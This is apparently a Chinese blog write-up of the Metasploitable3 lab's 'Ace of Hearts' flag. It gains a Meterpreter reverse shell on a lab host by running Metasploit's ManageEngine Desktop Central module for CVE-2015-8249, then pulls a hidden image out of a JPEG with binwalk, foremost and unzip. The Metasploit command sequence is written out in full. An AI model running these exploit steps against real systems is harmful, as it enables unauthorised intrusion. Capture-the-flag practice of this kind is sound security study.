Metasploitable3-Ace of Hearts 第八个flag

这是第八个flag.
结合之前的信息搜集,我们打开nessus的扫描报告
CVE-2015-8249

ZOHOManageEngineDesktopCentral(DC)是美国卓豪(ZOHO)公司的一套桌面管理解决方案。该方案包含软件分发、补丁管理、系统配置、远程控制等功能模块,可对桌面机以及服务器管理的整个生命周期提供支持。ZOHOManageEngineDC9版本中的FileUploadServlet类存在安全漏洞。远程攻击者可借助‘ConnectionId’参数利用该漏洞上传和执行任意的文件。

这一次准备用ManageEngine Desktop Central这个版本对应的漏洞了。
用浏览器打开相关网页

启动msf,搜索相应的漏洞利用模块,CVE-2015-8249

use exploit/windows/http/manageengine_connectionid_write
show options
set rhost 192.168.0.100
show payloads
set payload windows/meterpreter/reverse_tcp
show options
set lhost 192.168.0.108

由于我的靶机对应的目标端口是8022,不是默认的8020,所以第一次没意识到这一点,攻击失败

第二次修改一下对应的端口,set rport 8022
exploit

拿到shell了
提权不成功

直接找flag,
flag都是在User目录里面的,我现在先切换到user目录下,再用search命令查询Ace_of_Heart
没找到,只好根据先前的经验找了

最后我在C:\Users\Public\Pictures这个目录下找到
ace_of_hearts.jpg这个文件,居然是.jpg格式的。(捂脸)


先把它下载到本地

打开我的用户目录
它就在那里,双击打开

但这不是我们要找的红心A,在前面我找的几个flag都是png格式的,而这个是.jpg格式的

所以我需要用hexeditor将它打开分析一下
但是令我失望的是,没有什么异常的地方

我只好上另外一个kali里面专门对付隐写的工具
binwalk

binwalk是一个固件分析工具,旨在协助研究人员对固件非分析,提取及逆向工程用处。简单易用,完全自动化脚本,并通过自定义签名,提取规则和插件模块,还重要的一点的是可以轻松地扩展。

binwalk ace_of_hearts.jpg

果然内有乾坤
使用foremost工具将图片分离出来

foremost这个工具在分离图片完成后,会将处理完的文件放在它自动生成的output文件夹中,现在只要找到它进入。

另外一个办法就是将ace_of_hearts.jpg重命名为zip文件,因为刚才binwalk分析它的文件里面有zip压缩包

cp ace_of_hearts.jpg ace_of_hearts.zip
unzip ace_of_hearts.zip
ace_of_hearts.png解压出来了

最后就是display ace_of_hearts.png
将其显示出来

  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值